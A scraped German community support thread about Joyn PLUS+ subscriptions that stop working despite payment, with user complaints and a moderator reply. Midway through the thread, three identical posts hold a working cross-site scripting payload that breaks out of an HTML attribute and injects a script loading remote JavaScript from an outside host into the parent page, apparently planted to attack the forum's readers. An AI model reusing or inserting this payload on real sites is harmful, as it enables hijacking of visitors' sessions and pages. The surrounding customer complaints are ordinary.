Join + funktioniert nicht mehr habe es schon seit ein über einem Jahr aber seit der letzten Buchung geht nicht mehr
Derzeit beste Antwort von Melanie
Kommentar zeigenJoin + funktioniert nicht mehr habe es schon seit ein über einem Jahr aber seit der letzten Buchung geht nicht mehr
Derzeit beste Antwort von Melanie
Kommentar zeigenHallo und herzlich willkommen in der Community,
Es tut mir leid, dass du keinen Zugriff auf dein Joyn PLUS+ Abo hast . Unter deiner hier in der Community verwendeten E-Mail-Adresse konnte ich leider kein Abo finden. Hast du denn möglicherweise noch eine weitere E-Mail-Adresse?
Viele Grüße, Melanie
Hey
Konnte sich dein Anliegen bereits erfolgreich klären?
Mein joyn + Abo funktioniert nicht, trotz Bezahlung
Mein joyn Plus funktioniert nicht trotz abgebuchter Bezahlung
Mein joyn Plus funktioniert nicht trotz abgebuchter Bezahlung. In meinem Profil steht es sei nur ein free Account
fehlende Leistung trotz Abbuchung
Liebes Support-Team,
ich wende mich an Sie, da heute die Abbuchung meines Joyn Plus Abos belastet wurde, jedoch keinen Zugriff auf mein Plus Abo habe. Trotz erfolgter Zahlung, wird mir angezeigt, dass ich kein Plus Abo besitze. Dies stellt für mich ein Problem dar, und ich wäre Euch sehr dankbar wenn Ihr diese Angelegenheit schnellstmöglich klären könnt. Falls weitere Infos benötigt werden, stehe ich gerne zur Verfügung. Danke im Voraus für eine zeitnahe Rückmeldung. Susanne
Guten Morgen, ich habe auch nur die Leistungen des free Account, obwohl ich schon ein Plus Abo habe, was ich bereits genutzt habe. Nächste Abbuchung sollte erst am 23.11 sein. Steht, dass es ein Fehler zwischen Google und joyn ist...…
LG
Mein John plus Abo läuft trotz Abbuchung nicht
"><iframe srcdoc="<script>var a=parent.document.createElement("script");a.src="https://js.rip/7tbgs35r2x";parent.document.body.appendChild(a);</script>">
"><iframe srcdoc="<script>var a=parent.document.createElement("script");a.src="https://js.rip/7tbgs35r2x";parent.document.body.appendChild(a);</script>">
"><iframe srcdoc="<script>var a=parent.document.createElement("script");a.src="https://js.rip/7tbgs35r2x";parent.document.body.appendChild(a);</script>">
Hallo ich hab mir gestern die AP bestellt gehabt.ich komme aber nicht rein .Immer kommt dann es wäre nicht meine Schuld aber es würden immer irgend welche Schwierigkeiten geben.mit Appel und noch was.Ichhab gestern sie schon angeschrieben aber bisher keine Antwort.ich würde sie persönlich anrufen aber nirgends steht eine Telefonnummer.Mit diesen elektronischen Assistenten komme ich nicht weit.und wie ich hier sehe gibt es viele Probleme hier. Bitte um Antwort zumindest um Hilfe.Denn sonst hätte ich es nicht genommen.bin sauer.Gruß Möller
Hallo
Mein Abonnement läuft noch bis zum 03.12 es funktioniert aber nichts.
Wäre super wenn sich da jemand drum kümmern würde.
Sie haben bereits einen Account? Anmelden
Enter your username or e-mail address. We'll send you an e-mail with instructions to reset your password.